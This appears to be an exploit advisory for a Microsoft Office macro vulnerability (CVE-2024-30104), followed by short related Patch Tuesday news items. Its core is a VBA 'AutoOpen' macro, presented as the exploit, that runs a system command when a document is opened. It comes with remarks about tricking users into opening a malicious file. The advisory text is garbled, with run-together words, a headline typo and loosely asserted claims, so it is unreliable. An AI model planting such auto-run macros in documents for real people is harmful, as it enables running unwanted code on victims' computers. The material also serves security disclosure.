Headline
Microsoft Office 265 Remote Code Execution
Microsoft Office 365 appears susceptible to macro code execution that can result in remote code execution.
### [CVE-2024-30104](https://attackerkb.com/contributors/nu11secur1ty)The problem is still in the "docx" files this vulnerability is a 0 daybased on the Follina exploit. The Microsoft company still doesn't wantto understand, that they MUST remove macros options from the 365Office and their offline app. In this video, you will see an exampleof this, how some users can be trickery to open the malicious filethat is sent to them by the attacker. After execution of the file, thething will be very bad for the users who execute it on their computer.It depends of the scenario.### The exploit:```vbsSub AutoOpen()Dim Program As StringDim TaskID As DoubleOn Error Resume NextProgram = "shutdown /R"TaskID = Shell(Program, 1)If Err <> 0 ThenMsgBox "Can't start " & ProgramEnd IfEnd Sub```- Enjoy watching### PoC:[video](https://www.patreon.com/posts/cve-2024-30104-107163015)
Related news
Critical MSMQ RCE Bug Opens Microsoft Servers to Complete Takeover
CVE-2024-30080 is the only critical issue in Microsoft's June 2024 Patch Tuesday update, but many others require prompt attention as well.
Patch Tuesday, June 2024 “Recall” Edition
Microsoft today released updates to fix more than 50 security vulnerabilities in Windows and related software, a relatively light Patch Tuesday this month for Windows administrators. The software giant also responded to a torrent of negative feedback on a new feature of Redmond's flagship operating system that constantly takes screenshots of whatever users are doing on their computers, saying the feature would no longer be enabled by default.